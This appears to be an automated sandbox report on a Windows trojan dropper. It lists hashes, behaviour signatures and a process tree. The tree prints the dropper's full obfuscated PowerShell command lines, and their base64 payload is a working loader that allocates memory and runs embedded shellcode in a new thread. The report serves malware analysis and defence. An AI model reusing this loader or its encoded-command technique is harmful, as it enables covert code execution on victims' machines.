31e1703f07bd76589a558b15c260de6589615ad0bddd77c4e7efe9575da80af4

General

Target

TrojanDropper.Win32.Boxter.PAA.exe
Size

97KB
MD5

df19aad3e807c22af6adfec6ea8ecdc0
SHA1

8624f7f4c130f23bd740d4028aa3e788f5dcc363
SHA256

31e1703f07bd76589a558b15c260de6589615ad0bddd77c4e7efe9575da80af4
SHA512

4f052f678669ea228f782cb7fa20f79e222bda1b9382c7864ef55c7c9d2c20af8fa9ff7681ae1d5523c345373209c754bb34388b856cb6b51dcd981119b9be1d
SSDEEP

1536:k67ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIf8wbYwDUV/2O0:k4FfHgTWmCRkGbKGLeNTBf8OYoEq

Score

3^/10

discovery

Malware Config

Signatures

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TrojanDropper.Win32.Boxter.PAA.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2980	powershell.exe
2224	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2980	powershell.exe
Token: SeDebugPrivilege	2224	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1636 wrote to memory of 1504	1636	TrojanDropper.Win32.Boxter.PAA.exe	32
PID 1636 wrote to memory of 1504	1636	TrojanDropper.Win32.Boxter.PAA.exe	32
PID 1636 wrote to memory of 1504	1636	TrojanDropper.Win32.Boxter.PAA.exe	32
PID 1636 wrote to memory of 1504	1636	TrojanDropper.Win32.Boxter.PAA.exe	32
PID 1504 wrote to memory of 2980	1504	cmd.exe	33
PID 1504 wrote to memory of 2980	1504	cmd.exe	33
PID 1504 wrote to memory of 2980	1504	cmd.exe	33
PID 2980 wrote to memory of 2224	2980	powershell.exe	34
PID 2980 wrote to memory of 2224	2980	powershell.exe	34
PID 2980 wrote to memory of 2224	2980	powershell.exe	34

C:\Users\Admin\AppData\Local\Temp\TrojanDropper.Win32.Boxter.PAA.exe
"C:\Users\Admin\AppData\Local\Temp\TrojanDropper.Win32.Boxter.PAA.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1636
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\DEFA.tmp\DEFB.tmp\DEFC.bat C:\Users\Admin\AppData\Local\Temp\TrojanDropper.Win32.Boxter.PAA.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -w 1 -C "sv Qpm -;sv mo ec;sv B ((gv Qpm).value.toString()+(gv mo).value.toString());powershell (gv B).value.toString() 'JABBAEUATwAgAD0AIAAnACQAcgBZAHUAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcgBZAHUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA3ADQALAAwAHgANgA2ACwAMAB4ADMAMQAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4AGUAMgAsADAAeABhAGMALAAwAHgAOAA4ACwAMAB4ADgAZQAsADAAeABiAGUALAAwAHgANABlACwAMAB4ADcAMQAsADAAeAA0AGYALAAwAHgAYQAxACwAMAB4AGMANwAsADAAeAA5ADQALAAwAHgANwBlACwAMAB4AGYAMwAsADAAeABiADMALAAwAHgAZABkACwAMAB4AGQAMwAsADAAeABjADMALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeABkAGYALAAwAHgAYQA4ACwAMAB4ADkANAAsADAAeAAyADAALAAwAHgAZQBmACwAMAB4ADEAOQAsADAAeAA1ADIALAAwAHgANgBmACwAMAB4ADYANAAsADAAeAAxADcALAAwAHgANABhACwAMAB4ADUAZQAsADAAeAA4ADUALAAwAHgAZQA5ACwAMAB4ADQAYQAsADAAeAAwAGMALAAwAHgANAA1ACwAMAB4ADYAYgAsADAAeAAzADYALAAwAHgANABmACwAMAB4ADkAYQAsADAAeAA0AGIALAAwAHgAMAA3ACwAMAB4ADgAMAAsADAAeABlAGYALAAwAHgAOABhACwAMAB4ADQAMAAsADAAeAA1ADYALAAwAHgAOAA1ACwAMAB4ADYAMwAsADAAeAAxAGMALAAwAHgAMwBlACwAMAB4AGUAZQAsADAAeAAyAGUALAAwAHgAYgAwACwAMAB4ADQAYgAsADAAeABiADIALAAwAHgAZgAyACwAMAB4AGIAMQAsADAAeAA5AGIALAAwAHgAYgA4ACwAMAB4ADQAYgAsADAAeABjADkALAAwAHgAOQBlACwAMAB4ADcAZgAsADAAeAAzAGYALAAwAHgANgA1ACwAMAB4AGEAMAAsADAAeABhAGYALAAwAHgAOQAwACwAMAB4AGYAZQAsADAAeABlAGEALAAwAHgANQA3ACwAMAB4ADkAYQAsADAAeAA1ADgALAAwAHgAYwBiACwAMAB4ADYANgAsADAAeAA0AGYALAAwAHgAZABkACwAMAB4AGMAMgAsADAAeAAxAGQALAAwAHgANQAzACwAMAB4AGUAYwAsADAAeAAyAGIALAAwAHgAOQA0ACwAMAB4ADIAMAAsADAAeAAzAGEALAAwAHgANQBmACwAMAB4ADIANgAsADAAeABlADEALAAwAHgANwAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAYwBjACwAMAB4AGIAYwAsADAAeAAxADIALAAwAHgAZAA3ACwAMAB4ADAAOQAsADAAeAA3AGEALAAwAHgAYwBkACwAMAB4AGEAMgAsADAAeAA2ADEALAAwAHgANwA5ACwAMAB4ADcAMAAsADAAeABiADUALAAwAHgAYgAxACwAMAB4ADAAMAAsADAAeABhAGUALAAwAHgAMwAwACwAMAB4ADIANgAsADAAeABhADIALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAA4ADIALAAwAHgANQAzACwAMAB4AGUAOQAsADAAeAA3ADUALAAwAHgANAAwACwAMAB4ADUAZgAsADAAeAA0ADYALAAwAHgAZgAxACwAMAB4ADAAZQAsADAAeAA0ADMALAAwAHgANQA5ACwAMAB4AGQANgAsADAAeAAyADQALAAwAHgANwBmACwAMAB4AGQAMgAsADAAeABkADkALAAwAHgAZQBhACwAMAB4AGYANgAsADAAeABhADAALAAwAHgAZgBkACwAMAB4ADIAZQAsADAAeAA1ADMALAAwAHgANwAyACwAMAB4ADkAZgAsADAAeAA3ADcALAAwAHgAMwA5ACwAMAB4AGQANQAsADAAeABhADAALAAwAHgANgA4ACwAMAB4AGUANQAsADAAeAA4AGEALAAwAHgAMAA0ACwAMAB4AGUAMgAsADAAeAAwADcALAAwAHgAZABjACwAMAB4ADMAOQAsADAAeAAwAGIALAAwAHgAZAA4ACwAMAB4AGUAMQAsADAAeAA2ADcALAAwAHgAOQBjACwAMAB4ADQAOAAsADAAeAA3AGIALAAwAHgAZQBjACwAMAB4ADUAYwAsADAAeABmAGMALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeAAzADMALAAwAHgAOQA1ACwAMAB4AGEAZQAsADAAeAAxAGQALAAwAHgAOAA3ACwAMAB4ADEAMgAsADAAeAA2ADkALAAwAHgAZAA5ACwAMAB4AGUAOAAsADAAeAAwADkALAAwAHgANAA0ACwAMAB4ADMAZQAsADAAeAA0ADUALAAwAHgAZQAyACwAMAB4AGYANAAsADAAeAA5ADMALAAwAHgAMwA5ACwAMAB4ADYAYwAsADAAeABjADEALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAYwBhACwAMAB4AGIAZgAsADAAeAA2ADQALAAwAHgANAAwACwAMAB4ADUAZgAsADAAeAA0ADMALAAwAHgAZAA4ACwAMAB4ADMANQAsADAAeABmADcALAAwAHgAZAAzACwAMAB4AGMAMQAsADAAeABiADkALAAwAHgAMAA3ACwAMAB4ADMAYwAsADAAeAA0AGQALAAwAHgAYgA5ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAOAAxACwAMAB4AGQANwAsADAAeAA2AGUALAAwAHgAZQA1ACwAMAB4AGEAYwAsADAAeAA3ADQALAAwAHgAMwAzACwAMAB4ADcAYwAsADAAeAAxADkALAAwAHgAMQA2ACwAMAB4AGMAYgAsADAAeAAwAGEALAAwAHgAZABjACwAMAB4ADgAMwAsADAAeAA0ADUALAAwAHgAYgBkACwAMAB4ADIAOQAsADAAeAAwAGQALAAwAHgAZAAxACwAMAB4ADEAOQAsADAAeAAzAGYALAAwAHgAYwA2ACwAMAB4AGIANAAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGQAMAAsADAAeAA0AGMALAAwAHgAYgA0ACwAMAB4ADQAYQAsADAAeAA3ADUALAAwAHgAYgAxACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgAMgAyACwAMAB4ADMAOAAsADAAeAAwADUALAAwAHgANwAzACwAMAB4ADMAMwAsADAAeABlAGYALAAwAHgAYgAzACwAMAB4AGIAYQAsADAAeAA5ADgALAAwAHgANwA4ACwAMAB4AGMANAAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4AGYAZAAsADAAeAA5ADcALAAwAHgAMgA3ACwAMAB4ADUANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4ADkAZQAsADAAeAAzADEALAAwAHgAYgBlACwAMAB4ADMAZQAsADAAeAAzADAALAAwAHgAZgBhACwAMAB4AGIAZgAsADAAeAAxADQALAAwAHgAZABhACwAMAB4ADkANgAsADAAeAAzADUALAAwAHgAYwA4ACwAMAB4ADgAYgAsADAAeABlADYALAAwAHgANwA5ACwAMAB4AGYANgAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADkAZAAsADAAeAA5AGMALAAwAHgANABmACwAMAB4ADMAZgAsADAAeAAzADQALAAwAHgANwBlACwAMAB4ADAANgAsADAAeABkADcALAAwAHgAYgBkACwAMAB4AGMANgAsADAAeAAzADgALAAwAHgAYQAxACwAMAB4AGMAMQAsADAAeAAxADIALAAwAHgAMQA3ACwAMAB4AGYAZQAsADAAeAA2AGUALAAwAHgAYwBlACwAMAB4AGMAZQAsADAAeAA2ADgALAAwAHgAYgBjACwAMAB4AGYANgAsADAAeABmADYALAAwAHgAMQAzACwAMAB4ADQAMQAsADAAeAAyADMALAAwAHgAOAAzACwAMAB4ADIAMwAsADAAeABjADgALAAwAHgAZABhACwAMAB4AGUANAAsADAAeAAyAGIALAAwAHgAMgAwACwAMAB4AGUAMwAsADAAeABmADQALAAwAHgANAAzACwAMAB4ADAAMwAsADAAeAAxADMALAAwAHgAYwAxACwAMAB4ADcAMwAsADAAeAA3ADQALAAwAHgAMAA2ACwAMAB4ADYANQAsADAAeAAwADYALAAwAHgANAA2ACwAMAB4AGMAMQAsADAAeAA4AGEALAAwAHgANQBkACwAMAB4AGYAYQAsADAAeAA0ADQALAAwAHgAOQA0ACwAMAB4ADQAOAAsADAAeAA5ADEALAAwAHgAMgA4ACwAMAB4ADAAMgAsADAAeAA3ADIALAAwAHgANwA2ACwAMAB4AGEAOQAsADAAeABkADIALAAwAHgAMQBhACwAMAB4ADcANgAsADAAeABhADkALAAwAHgAOQAyACwAMAB4AGQAYQAsADAAeAAyADUALAAwAHgAYwAxACwAMAB4ADQAYQAsADAAeAA3AGUALAAwAHgAOQBhACwAMAB4AGYANAAsADAAeAA5ADQALAAwAHgAYQBiACwAMAB4ADgAZQAsADAAeABhADQALAAwAHgAMwA5ACwAMAB4AGQAYQAsADAAeAA1ADYALAAwAHgAMQBkACwAMAB4AGQANgAsADAAeABkAGMALAAwAHgAYgA4ACwAMAB4AGEAMgAsADAAeAAyADYALAAwAHgAOABmACwAMAB4AGUAZQAsADAAeABjAGEALAAwAHgAMwA0ACwAMAB4AGIAOQAsADAAeAA4ADYALAAwAHgAZQA5ACwAMAB4AGMANgAsADAAeAAxADAALAAwAHgAMQBkACwAMAB4ADIAZAAsADAAeAA0AGMALAAwAHgANQA3ACwAMAB4ADkANQAsADAAeABhADkALAAwAHgAYQBjACwAMAB4AGEANAAsADAAeAAyAGYALAAwAHgANwA1ACwAMAB4AGQAYgAsADAAeABjAGYALAAwAHgANgA4ACwAMAB4AGIANQAsADAAeAA3AGIALAAwAHgAZQA3ACwAMAB4AGUAMAAsADAAeABjADYALAAwAHgANwBiACwAMAB4ADAAOAAsADAAeABjADMALAAwAHgAMAAxACwAMAB4AGIANgAsADAAeABkADgALAAwAHgAMQA1ACwAMAB4ADQANAAsADAAeAA4AGUALAAwAHgAMABhACwAMAB4ADYAZQAsADAAeAA5ADAALAAwAHgAYwAwACwAMAB4ADYAMwAsADAAeABiAGMALAAwAHgAZAA4ACwAMAB4ADEAYwA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUQBpAHAAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAFEAaQBwAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABRAGkAcAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEEARQBPACkAKQA7ACQAZgBkAEkAIAA9ACAAIgAtAGUAYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAZQBpAHcAdAAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABlAGkAdwB0ACAAJABmAGQASQAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJABmAGQASQAgACQAZQAiADsAfQA='"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ec JABBAEUATwAgAD0AIAAnACQAcgBZAHUAIAA9ACAAJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAcgBZAHUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBmACwAMAB4ADUAOQAsADAAeAA3ADQALAAwAHgANgA2ACwAMAB4ADMAMQAsADAAeABkAGEALAAwAHgAZABiACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGEALAAwAHgAMgA5ACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANgAzACwAMAB4ADMAMQAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADAAMwAsADAAeAA3AGEALAAwAHgAMQA1ACwAMAB4ADgAMwAsADAAeABlAGEALAAwAHgAZgBjACwAMAB4AGUAMgAsADAAeABhAGMALAAwAHgAOAA4ACwAMAB4ADgAZQAsADAAeABiAGUALAAwAHgANABlACwAMAB4ADcAMQAsADAAeAA0AGYALAAwAHgAYQAxACwAMAB4AGMANwAsADAAeAA5ADQALAAwAHgANwBlACwAMAB4AGYAMwAsADAAeABiADMALAAwAHgAZABkACwAMAB4AGQAMwAsADAAeABjADMALAAwAHgAYgAwACwAMAB4AGIAMAAsADAAeABkAGYALAAwAHgAYQA4ACwAMAB4ADkANAAsADAAeAAyADAALAAwAHgAZQBmACwAMAB4ADEAOQAsADAAeAA1ADIALAAwAHgANgBmACwAMAB4ADYANAAsADAAeAAxADcALAAwAHgANABhACwAMAB4ADUAZQAsADAAeAA4ADUALAAwAHgAZQA5ACwAMAB4ADQAYQAsADAAeAAwAGMALAAwAHgANAA1ACwAMAB4ADYAYgAsADAAeAAzADYALAAwAHgANABmACwAMAB4ADkAYQAsADAAeAA0AGIALAAwAHgAMAA3ACwAMAB4ADgAMAAsADAAeABlAGYALAAwAHgAOABhACwAMAB4ADQAMAAsADAAeAA1ADYALAAwAHgAOAA1ACwAMAB4ADYAMwAsADAAeAAxAGMALAAwAHgAMwBlACwAMAB4AGUAZQAsADAAeAAyAGUALAAwAHgAYgAwACwAMAB4ADQAYgAsADAAeABiADIALAAwAHgAZgAyACwAMAB4AGIAMQAsADAAeAA5AGIALAAwAHgAYgA4ACwAMAB4ADQAYgAsADAAeABjADkALAAwAHgAOQBlACwAMAB4ADcAZgAsADAAeAAzAGYALAAwAHgANgA1ACwAMAB4AGEAMAAsADAAeABhAGYALAAwAHgAOQAwACwAMAB4AGYAZQAsADAAeABlAGEALAAwAHgANQA3ACwAMAB4ADkAYQAsADAAeAA1ADgALAAwAHgAYwBiACwAMAB4ADYANgAsADAAeAA0AGYALAAwAHgAZABkACwAMAB4AGMAMgAsADAAeAAxAGQALAAwAHgANQAzACwAMAB4AGUAYwAsADAAeAAyAGIALAAwAHgAOQA0ACwAMAB4ADIAMAAsADAAeAAzAGEALAAwAHgANQBmACwAMAB4ADIANgAsADAAeABlADEALAAwAHgANwAzACwAMAB4ADkAZgAsADAAeAA4ADUALAAwAHgAYwBjACwAMAB4AGIAYwAsADAAeAAxADIALAAwAHgAZAA3ACwAMAB4ADAAOQAsADAAeAA3AGEALAAwAHgAYwBkACwAMAB4AGEAMgAsADAAeAA2ADEALAAwAHgANwA5ACwAMAB4ADcAMAAsADAAeABiADUALAAwAHgAYgAxACwAMAB4ADAAMAAsADAAeABhAGUALAAwAHgAMwAwACwAMAB4ADIANgAsADAAeABhADIALAAwAHgAMgA1ACwAMAB4AGUAMgAsADAAeAA4ADIALAAwAHgANQAzACwAMAB4AGUAOQAsADAAeAA3ADUALAAwAHgANAAwACwAMAB4ADUAZgAsADAAeAA0ADYALAAwAHgAZgAxACwAMAB4ADAAZQAsADAAeAA0ADMALAAwAHgANQA5ACwAMAB4AGQANgAsADAAeAAyADQALAAwAHgANwBmACwAMAB4AGQAMgAsADAAeABkADkALAAwAHgAZQBhACwAMAB4AGYANgAsADAAeABhADAALAAwAHgAZgBkACwAMAB4ADIAZQAsADAAeAA1ADMALAAwAHgANwAyACwAMAB4ADkAZgAsADAAeAA3ADcALAAwAHgAMwA5ACwAMAB4AGQANQAsADAAeABhADAALAAwAHgANgA4ACwAMAB4AGUANQAsADAAeAA4AGEALAAwAHgAMAA0ACwAMAB4AGUAMgAsADAAeAAwADcALAAwAHgAZABjACwAMAB4ADMAOQAsADAAeAAwAGIALAAwAHgAZAA4ACwAMAB4AGUAMQAsADAAeAA2ADcALAAwAHgAOQBjACwAMAB4ADQAOAAsADAAeAA3AGIALAAwAHgAZQBjACwAMAB4ADUAYwAsADAAeABmAGMALAAwAHgAZgA0ACwAMAB4ADYANQAsADAAeAAzADMALAAwAHgAOQA1ACwAMAB4AGEAZQAsADAAeAAxAGQALAAwAHgAOAA3ACwAMAB4ADEAMgAsADAAeAA2ADkALAAwAHgAZAA5ACwAMAB4AGUAOAAsADAAeAAwADkALAAwAHgANAA0ACwAMAB4ADMAZQAsADAAeAA0ADUALAAwAHgAZQAyACwAMAB4AGYANAAsADAAeAA5ADMALAAwAHgAMwA5ACwAMAB4ADYAYwAsADAAeABjADEALAAwAHgANAA1ACwAMAB4AGMANwAsADAAeABjAGIALAAwAHgAYwBhACwAMAB4AGIAZgAsADAAeAA2ADQALAAwAHgANAAwACwAMAB4ADUAZgAsADAAeAA0ADMALAAwAHgAZAA4ACwAMAB4ADMANQAsADAAeABmADcALAAwAHgAZAAzACwAMAB4AGMAMQAsADAAeABiADkALAAwAHgAMAA3ACwAMAB4ADMAYwAsADAAeAA0AGQALAAwAHgAYgA5ACwAMAB4ADAANwAsADAAeABiAGMALAAwAHgAOAAxACwAMAB4AGQANwAsADAAeAA2AGUALAAwAHgAZQA1ACwAMAB4AGEAYwAsADAAeAA3ADQALAAwAHgAMwAzACwAMAB4ADcAYwAsADAAeAAxADkALAAwAHgAMQA2ACwAMAB4AGMAYgAsADAAeAAwAGEALAAwAHgAZABjACwAMAB4ADgAMwAsADAAeAA0ADUALAAwAHgAYgBkACwAMAB4ADIAOQAsADAAeAAwAGQALAAwAHgAZAAxACwAMAB4ADEAOQAsADAAeAAzAGYALAAwAHgAYwA2ACwAMAB4AGIANAAsADAAeABkADgALAAwAHgAZgA1ACwAMAB4AGQAMAAsADAAeAA0AGMALAAwAHgAYgA0ACwAMAB4ADQAYQAsADAAeAA3ADUALAAwAHgAYgAxACwAMAB4ADEAYQAsADAAeAAyADUALAAwAHgAMgAyACwAMAB4ADMAOAAsADAAeAAwADUALAAwAHgANwAzACwAMAB4ADMAMwAsADAAeABlAGYALAAwAHgAYgAzACwAMAB4AGIAYQAsADAAeAA5ADgALAAwAHgANwA4ACwAMAB4AGMANAAsADAAeAA3ADAALAAwAHgAZgA2ACwAMAB4AGYAZAAsADAAeAA5ADcALAAwAHgAMgA3ACwAMAB4ADUANQAsADAAeABhADkALAAwAHgANAA0ACwAMAB4ADkAZQAsADAAeAAzADEALAAwAHgAYgBlACwAMAB4ADMAZQAsADAAeAAzADAALAAwAHgAZgBhACwAMAB4AGIAZgAsADAAeAAxADQALAAwAHgAZABhACwAMAB4ADkANgAsADAAeAAzADUALAAwAHgAYwA4ACwAMAB4ADgAYgAsADAAeABlADYALAAwAHgANwA5ACwAMAB4AGYANgAsADAAeAA0AGIALAAwAHgANgBmACwAMAB4ADkAZAAsADAAeAA5AGMALAAwAHgANABmACwAMAB4ADMAZgAsADAAeAAzADQALAAwAHgANwBlACwAMAB4ADAANgAsADAAeABkADcALAAwAHgAYgBkACwAMAB4AGMANgAsADAAeAAzADgALAAwAHgAYQAxACwAMAB4AGMAMQAsADAAeAAxADIALAAwAHgAMQA3ACwAMAB4AGYAZQAsADAAeAA2AGUALAAwAHgAYwBlACwAMAB4AGMAZQAsADAAeAA2ADgALAAwAHgAYgBjACwAMAB4AGYANgAsADAAeABmADYALAAwAHgAMQAzACwAMAB4ADQAMQAsADAAeAAyADMALAAwAHgAOAAzACwAMAB4ADIAMwAsADAAeABjADgALAAwAHgAZABhACwAMAB4AGUANAAsADAAeAAyAGIALAAwAHgAMgAwACwAMAB4AGUAMwAsADAAeABmADQALAAwAHgANAAzACwAMAB4ADAAMwAsADAAeAAxADMALAAwAHgAYwAxACwAMAB4ADcAMwAsADAAeAA3ADQALAAwAHgAMAA2ACwAMAB4ADYANQAsADAAeAAwADYALAAwAHgANAA2ACwAMAB4AGMAMQAsADAAeAA4AGEALAAwAHgANQBkACwAMAB4AGYAYQAsADAAeAA0ADQALAAwAHgAOQA0ACwAMAB4ADQAOAAsADAAeAA5ADEALAAwAHgAMgA4ACwAMAB4ADAAMgAsADAAeAA3ADIALAAwAHgANwA2ACwAMAB4AGEAOQAsADAAeABkADIALAAwAHgAMQBh